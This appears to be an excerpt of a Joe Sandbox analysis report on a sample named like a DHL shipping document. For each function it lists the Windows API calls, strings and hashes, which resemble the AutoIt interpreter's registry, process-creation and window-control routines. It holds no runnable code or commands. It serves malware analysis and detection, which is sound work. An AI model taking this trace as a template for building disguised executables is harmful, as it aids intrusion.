SetUserObjectSecurity.USER32(?,00000004,?), ref: 00200F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200F6E
HeapFree.KERNEL32(00000000), ref: 00200F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200F7E
HeapFree.KERNEL32(00000000), ref: 00200F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200F8E
HeapFree.KERNEL32(00000000), ref: 00200F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00200FA1
HeapFree.KERNEL32(00000000), ref: 00200FA8

Part of subcall function 00201193: GetProcessHeap.KERNEL32(00000008,00200BB1,?,00000000,?,00200BB1,?), ref: 002011A1
Part of subcall function 00201193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00200BB1,?), ref: 002011A8
Part of subcall function 00201193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00200BB1,?), ref: 002011B7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1863bef2bdb624ab711e19a8a823016a52501181bd68cdb90a0d1312897d7872
Instruction ID: 61583c0cfe4187ffda9e331a9c889b46dfaf4c7288ea6da1ecd60ca0d73e54c5
Opcode Fuzzy Hash: 1863bef2bdb624ab711e19a8a823016a52501181bd68cdb90a0d1312897d7872
Instruction Fuzzy Hash: E671617191030AEBEF209FA4DC88FAEBBB8BF05301F144125F959F6192DB719915DB60

Function 0022C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0022C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0023CC08,00000000,?,00000000,?,?), ref: 0022C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0022C5A4
_wcslen.LIBCMT ref: 0022C5F4
_wcslen.LIBCMT ref: 0022C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0022C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0022C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0022C84D
RegCloseKey.ADVAPI32(?), ref: 0022C881
RegCloseKey.ADVAPI32(00000000), ref: 0022C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0022C960

Strings

REG_EXPAND_SZ, xrefs: 0022C5CD
REG_MULTI_SZ, xrefs: 0022C6F5
REG_DWORD, xrefs: 0022C804
REG_QWORD, xrefs: 0022C8C3
REG_SZ, xrefs: 0022C644
REG_BINARY, xrefs: 0022C913

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: e47e8ad73a037d61f2c03ca9d168de08302fe908d2f69ae0556417f1d8ee8917
Instruction ID: 1429302d8e0b13586594da98bd2bb7105ea513dbb94bd88f324812a03af48f9f
Opcode Fuzzy Hash: e47e8ad73a037d61f2c03ca9d168de08302fe908d2f69ae0556417f1d8ee8917
Instruction Fuzzy Hash: AB128939614211AFCB14EF14D891B2AB7E5FF89314F14885CF88A9B3A2DB31ED51CB81

Function 0023091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002309C6
_wcslen.LIBCMT ref: 00230A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00230A54
_wcslen.LIBCMT ref: 00230A8A
_wcslen.LIBCMT ref: 00230B06
_wcslen.LIBCMT ref: 00230B81

Part of subcall function 001BF9F2: _wcslen.LIBCMT ref: 001BF9FD

Part of subcall function 00202BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00202BFA

Strings

EXISTS, xrefs: 00230B7C, 00230B97
GETSELECTED, xrefs: 00230C4E
ISCHECKED, xrefs: 00230CE1
EXPAND, xrefs: 00230BF8
GETITEMCOUNT, xrefs: 00230C1E
SELECT, xrefs: 00230D11
UNCHECK, xrefs: 00230D3E
COLLAPSE, xrefs: 00230B01, 00230B1C
GETTOTALCOUNT, xrefs: 002309F2, 00230A17
CHECK, xrefs: 00230A85, 00230AA0
GETTEXT, xrefs: 00230C97

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 7c264624c67ab1b392c934a0ea6fb03a96a00f6669b0420345182ec13446284f
Instruction ID: 03415ecfbf776924d52294a645396b7bde6c9765928c4c07d80223a6de930af7
Opcode Fuzzy Hash: 7c264624c67ab1b392c934a0ea6fb03a96a00f6669b0420345182ec13446284f
Instruction Fuzzy Hash: 39E1C2752283028FC714EF24C4A092AB7E2FF99718F14495DF8969B3A2D730ED55CB91

Function 0022C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0022B6AE,?,?), ref: 0022C9B5
_wcslen.LIBCMT ref: 0022C9F1
_wcslen.LIBCMT ref: 0022CA68
_wcslen.LIBCMT ref: 0022CA9E
_wcslen.LIBCMT ref: 0022CAF9
_wcslen.LIBCMT ref: 0022CB2F
_wcslen.LIBCMT ref: 0022CB7F

Strings

HKCU, xrefs: 0022CBCE
HKEY_CURRENT_USER, xrefs: 0022CBBD
HKEY_LOCAL_MACHINE, xrefs: 0022CA62, 0022CA67
HKEY_CLASSES_ROOT, xrefs: 0022CAF3, 0022CAF8
HKEY_CURRENT_CONFIG, xrefs: 0022CB79, 0022CB7E
HKU, xrefs: 0022CBF0
HKCC, xrefs: 0022CBAC
HKLM, xrefs: 0022CA98, 0022CA9D
HKEY_USERS, xrefs: 0022CBDF
HKCR, xrefs: 0022CB29, 0022CB2E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 16bfeceb72cb9c7f5b3453242cbf9308e6e7316d0b6af8bf2b337b34ef81d3ea
Instruction ID: 91db74f0268630b7acfb7a9994e6a7f4c502a21fd7bcaaf78f883b9793619e8d
Opcode Fuzzy Hash: 16bfeceb72cb9c7f5b3453242cbf9308e6e7316d0b6af8bf2b337b34ef81d3ea
Instruction Fuzzy Hash: AB71E23263413BABCB20DEB8EC516BE3391AF71758B300129F85697284E771CDA5C3A0

Function 0023833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023835A
_wcslen.LIBCMT ref: 0023836E
_wcslen.LIBCMT ref: 00238391
_wcslen.LIBCMT ref: 002383B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002383F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00235BF2), ref: 0023844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00238487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002384CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00238501
FreeLibrary.KERNEL32(?), ref: 0023850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0023851D
DestroyIcon.USER32(?,?,?,?,?,00235BF2), ref: 0023852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00238549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00238555

Strings

.dll, xrefs: 002383AB
.icl, xrefs: 00238368
.exe, xrefs: 00238388

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 09ebf17fd616c62cdf8819fda6800455cee94434bebd22324d7993e2fbc4a623
Instruction ID: 3eab52cffe4c29065a86d5e6cd276924f9ca69efbafdc5ca5292a60415f29fa2
Opcode Fuzzy Hash: 09ebf17fd616c62cdf8819fda6800455cee94434bebd22324d7993e2fbc4a623
Instruction Fuzzy Hash: 6961F1B1924316BBEB14DF64DC45BBE77A8BB18710F104209F915EA1D1DBB4E9A0CBA0

Function 001A7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#notrayicon, xrefs: 001A77E7
', xrefs: 001E5169
#requireadmin, xrefs: 001A77FF
", xrefs: 001E5153
#include, xrefs: 001A7847
#pragma compile, xrefs: 001A77D3
#include-once, xrefs: 001A782F
#cs, xrefs: 001A7873, 001A78C5
Cannot parse #include, xrefs: 001E5279
#comments-end, xrefs: 001A78D9
Unterminated group of comments, xrefs: 001E528C
#comments-start, xrefs: 001A785F, 001A78B1
#ce, xrefs: 001A78ED
#OnAutoItStartRegister, xrefs: 001A7817
Bad directive syntax error, xrefs: 001E519A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 11f15b3207c3fdf585e9054f712f96cd5c9237bae5bd60e35c8896733cbe585a
Instruction ID: 35fa062fcf8448b78b0fc407e7e1940a48504fb04a4922f24e76923f029d797b
Opcode Fuzzy Hash: 11f15b3207c3fdf585e9054f712f96cd5c9237bae5bd60e35c8896733cbe585a
Instruction Fuzzy Hash: 3B814B75A04605BBDB24BFA0DC46FBF37A9AF26300F044024F904AB1D6EB70DA51D7A1

Function 00205A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00205A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00205A40
SetWindowTextW.USER32(?,?), ref: 00205A57
GetDlgItem.USER32(?,000003EA), ref: 00205A6C
SetWindowTextW.USER32(00000000,?), ref: 00205A72
GetDlgItem.USER32(?,000003E9), ref: 00205A82
SetWindowTextW.USER32(00000000,?), ref: 00205A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00205AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00205AC3
GetWindowRect.USER32(?,?), ref: 00205ACC
_wcslen.LIBCMT ref: 00205B33
SetWindowTextW.USER32(?,?), ref: 00205B6F
GetDesktopWindow.USER32 ref: 00205B75
GetWindowRect.USER32(00000000), ref: 00205B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00205BD3
GetClientRect.USER32(?,?), ref: 00205BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00205C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00205C2F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 525d827b6180b2efaf2cb37344d015af513f467d5d003c052d4103516c540655
Instruction ID: 74b109b322f2f75766aff1f75cb2ddcd0d6b2386d16a14bc8f6692a7bca6faf4
Opcode Fuzzy Hash: 525d827b6180b2efaf2cb37344d015af513f467d5d003c052d4103516c540655
Instruction Fuzzy Hash: 48716C31A10B1AAFDB20DFA8CE89AAFBBF5FF48704F104518E542A25A5D774E950CF50

Function 002030F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0020318D
_wcslen.LIBCMT ref: 002031F8

Strings

CLASSNN, xrefs: 002031F3, 00203204
INSTANCE, xrefs: 00203453
[&, xrefs: 0020339A
CLASS, xrefs: 00203188, 002031A5
NAME, xrefs: 00203335, 00203346
REGEXPCLASS, xrefs: 00203255, 00203266
TEXT, xrefs: 0020347C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[&
API String ID: 176396367-842257027
Opcode ID: 469e491f48b3a32bb5e8adb14302c11307fb222810c1eedcd0981ab101bfca5d
Instruction ID: 1a11fb31dee529d1532412fa3f71836de57279234b9874494cfe83f02dc32275
Opcode Fuzzy Hash: 469e491f48b3a32bb5e8adb14302c11307fb222810c1eedcd0981ab101bfca5d
Instruction Fuzzy Hash: 86E1E632A207269FCB14DF64C8917EDFBB8BF58710F548119E456E7282DB30AEA5C790

Function 001C00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001C00C6

Part of subcall function 001C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0027070C,00000FA0,F6507637,?,?,?,?,001E23B3,000000FF), ref: 001C011C
Part of subcall function 001C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001E23B3,000000FF), ref: 001C0127
Part of subcall function 001C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001E23B3,000000FF), ref: 001C0138
Part of subcall function 001C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001C014E
Part of subcall function 001C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001C015C
Part of subcall function 001C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001C016A
Part of subcall function 001C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001C0195
Part of subcall function 001C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001C01A0

___scrt_fastfail.LIBCMT ref: 001C00E7

Part of subcall function 001C00A3: __onexit.LIBCMT ref: 001C00A9

Strings

kernel32.dll, xrefs: 001C0133
WakeAllConditionVariable, xrefs: 001C0162
InitializeConditionVariable, xrefs: 001C0148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001C0122
SleepConditionVariableCS, xrefs: 001C0154

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: d98e97ec5b2879f21364948bf108c2cb04b36454cf8d19c3d5027a3bec88db88
Instruction ID: 45bdbb306d768becde95da70e8c7d11738690ea8e477d6af3f1c6135ce70c139
Opcode Fuzzy Hash: d98e97ec5b2879f21364948bf108c2cb04b36454cf8d19c3d5027a3bec88db88
Instruction Fuzzy Hash: 8821F672A44710EBE7166BA4BD4EF6AB3E4EB2DB51F15012DF845E2291DBB0DC008A90

Function 002144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0023CC08), ref: 00214527
_wcslen.LIBCMT ref: 0021453B
_wcslen.LIBCMT ref: 00214599
_wcslen.LIBCMT ref: 002145F4
_wcslen.LIBCMT ref: 0021463F
_wcslen.LIBCMT ref: 002146A7

Part of subcall function 001BF9F2: _wcslen.LIBCMT ref: 001BF9FD

GetDriveTypeW.KERNEL32(?,00266BF0,00000061), ref: 00214743

Strings

removable, xrefs: 002145EA, 002145EF
all, xrefs: 00214531, 00214536
unknown, xrefs: 00214708
cdrom, xrefs: 0021458F, 00214594
fixed, xrefs: 00214635, 0021463A
ramdisk, xrefs: 002146F1
network, xrefs: 0021469D, 002146A2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 561e514e5317bdc2ed48f7b811bfb09207adaa85524b19006401a84e311a604b
Instruction ID: 11269534fec1ed8c6235d82b14367bd63f4f279159b4e1b7855fe6b51188c9fb
Opcode Fuzzy Hash: 561e514e5317bdc2ed48f7b811bfb09207adaa85524b19006401a84e311a604b
Instruction Fuzzy Hash: 1EB112716283029FC710EF28C890AAAF7E5BFB6724F50491DF49AD7291D730D895CB92

Function 0023911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

DragQueryPoint.SHELL32(?,?), ref: 00239147

Part of subcall function 00237674: ClientToScreen.USER32(?,?), ref: 0023769A
Part of subcall function 00237674: GetWindowRect.USER32(?,?), ref: 00237710
Part of subcall function 00237674: PtInRect.USER32(?,?,00238B89), ref: 00237720

SendMessageW.USER32(?,000000B0,?,?), ref: 002391B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002391BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002391DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00239225
SendMessageW.USER32(?,000000B0,?,?), ref: 0023923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00239255
SendMessageW.USER32(?,000000B1,?,?), ref: 00239277
DragFinish.SHELL32(?), ref: 0023927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00239371

Strings

@GUI_DRAGID, xrefs: 002392E9
p#', xrefs: 002392BB
@GUI_DROPID, xrefs: 0023929E
@GUI_DRAGFILE, xrefs: 00239320

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#'
API String ID: 221274066-3577977142
Opcode ID: 50dba577402063223e20cfe5e782d5b1e03a2bb80b5ae61ef9414229a3ec1838
Instruction ID: 2a48c89f3f13c3284b4ddf53988a47f5778315a153623d8465d94d4237ca890f
Opcode Fuzzy Hash: 50dba577402063223e20cfe5e782d5b1e03a2bb80b5ae61ef9414229a3ec1838
Instruction Fuzzy Hash: 97618B71108301AFC705EF64DC89DAFBBF8EF9A750F10091EF595922A0DB709A99CB52

Function 0022AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0022B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0022B1D4
_wcslen.LIBCMT ref: 0022B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0022B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0022B236
_wcslen.LIBCMT ref: 0022B332

Part of subcall function 002105A7: GetStdHandle.KERNEL32(000000F6), ref: 002105C6

_wcslen.LIBCMT ref: 0022B34B
_wcslen.LIBCMT ref: 0022B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0022B3B6
GetLastError.KERNEL32(00000000), ref: 0022B407
CloseHandle.KERNEL32(?), ref: 0022B439
CloseHandle.KERNEL32(00000000), ref: 0022B44A
CloseHandle.KERNEL32(00000000), ref: 0022B45C
CloseHandle.KERNEL32(00000000), ref: 0022B46E
CloseHandle.KERNEL32(?), ref: 0022B4E3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 774f766fc01faac2853493d9e1baa745d4f7166a91bd978fea056d8c99b61380
Instruction ID: 34ab1a5d106493b7fa110d15edf5cc873fefe67c3ca89598ed84236f30ef154f
Opcode Fuzzy Hash: 774f766fc01faac2853493d9e1baa745d4f7166a91bd978fea056d8c99b61380
Instruction Fuzzy Hash: 33F1CD31518351EFC715EF24D891B6EBBE1AF85310F18855DF8899B2A2CB31ED50CB52

Function 001A326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00271990), ref: 001E2F8D
GetMenuItemCount.USER32(00271990), ref: 001E303D
GetCursorPos.USER32(?), ref: 001E3081
SetForegroundWindow.USER32(00000000), ref: 001E308A
TrackPopupMenuEx.USER32(00271990,00000000,?,00000000,00000000,00000000), ref: 001E309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001E30A9

Strings

0, xrefs: 001A327D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
